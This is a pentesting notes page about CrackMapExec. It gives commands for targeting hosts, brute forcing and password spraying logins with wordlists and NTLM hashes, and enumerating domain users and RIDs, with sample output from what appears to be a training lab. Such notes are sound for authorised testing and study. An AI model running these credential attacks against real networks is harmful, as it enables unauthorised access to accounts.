Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Usage
  • Target Formats
  • Using Credentials
  • Brute force login with wordlists
  • Enumerating with crackmapexec
  • Find users
  1. Windows Pentesting
  2. Tools

Crackmapexec (CME)

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.


Usage

Running cme --help will list general options and protocols that are available (Notice the 'protocols' section below):

#~ crackmapexec --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
           [--darrell] [--verbose]
           {http,smb,mssql} ...

      ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______
     /      ||   _  \         /   \      /      ||  |/  / |   \/   |     /   \     |   _  \  |   ____|\  \ /  / |   ____| /      |
    |  ,----'|  |_)  |       /  ^  \    |  ,----'|  '  /  |  \  /  |    /  ^  \    |  |_)  | |  |__    \  V  /  |  |__   |  ,----'
    |  |     |      /       /  /_\  \   |  |     |    <   |  |\/|  |   /  /_\  \   |   ___/  |   __|    >   <   |   __|  |  |
    |  `----.|  |\  \----. /  _____  \  |  `----.|  .  \  |  |  |  |  /  _____  \  |  |      |  |____  /  .  \  |  |____ |  `----.
     \______|| _| `._____|/__/     \__\  \______||__|\__\ |__|  |__| /__/     \__\ | _|      |_______|/__/ \__\ |_______| \______|

                                         A swiss army knife for pentesting networks
                                    Forged by @byt3bl33d3r using the powah of dank memes

                                                      Version: 4.0.0dev
                                                     Codename: 'Sercurty'

optional arguments:
  -h, --help         show this help message and exit
  -v, --version      show program's version number and exit
  -t THREADS         set how many concurrent threads to use (default: 100)
  --timeout TIMEOUT  max timeout in seconds of each thread (default: None)
  --jitter INTERVAL  sets a random delay between each connection (default: None)
  --darrell          give Darrell a hand
  --verbose          enable verbose output

protocols:
  available protocols

  {http,smb,mssql}
    http             own stuff using HTTP(S)
    smb              own stuff using SMB and/or Active Directory
    mssql            own stuff using MSSQL and/or Active Directory

Target Formats

Every protocol supports targets by CIDR notation(s), IP address(s), IP range(s), hostname(s), a file containing a list of targets or combination of all of the latter:

crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
	crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt

Using Credentials

Every protocol supports using credentials in one form or another. For details on using credentials with a specific protocol, see the appropriate wiki section. Generally speaking, to use credentials, you can run the following commands:

crackmapexec <protocol> <target(s)> -u username -p password

ℹ️ When using usernames or passwords that contain special symbols, wrap them in single quotes to make your shell interpret them as a string.

Example:

crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'

Brute force login with wordlists

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

ℹ️ By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.

Example:

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success

Enumerating with crackmapexec

Here are some common commands to use when enumerating with crackmapexec

Find users

┌──(kali㉿kali)-[~/htb/zephyr/192.168.210.10]
└─$ crackmapexec smb 192.168.210.10 -u users.txt -p passwords.txt
SMB         192.168.210.10  445    ZPH-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.10  445    ZPH-SVRDC01      [-] zsm.local\marcus:Mail4Painter2022!@# STATUS_LOGON_FAILURE 
SMB         192.168.210.10  445    ZPH-SVRDC01      [-] zsm.local\marcus:P@ssw0rd STATUS_LOGON_FAILURE 
SMB         192.168.210.10  445    ZPH-SVRDC01      [-] zsm.local\marcus:!QAZ1qaz STATUS_LOGON_FAILURE 
SMB         192.168.210.10  445    ZPH-SVRDC01      [+] zsm.local\marcus:!QAZ2wsx

With credentials we can get all users in the domain:

crackmapexec smb zsm.local -u marcus -p password123 --users                       
SMB         zsm.local       445    ZPH-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         zsm.local       445    ZPH-SVRDC01      [+] zsm.local\jamie:P@ssw0rd 
SMB         zsm.local       445    ZPH-SVRDC01      [+] Enumerated domain user(s)
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\jamie                          badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\ca_svc                         badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\marcus                         badpwdcount: 6 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\paul.williams                  badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\daniel.morris                  badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\Administrator                  badpwdcount: 3 desc: Built-in account for administering the computer/domain

Use --rid-brute to brute all principals in the domain:

crackmapexec smb zsm.local -u <user> -p <password> --rid-brute 10000
PreviousNetExecNextPowerview

Last updated 1 year ago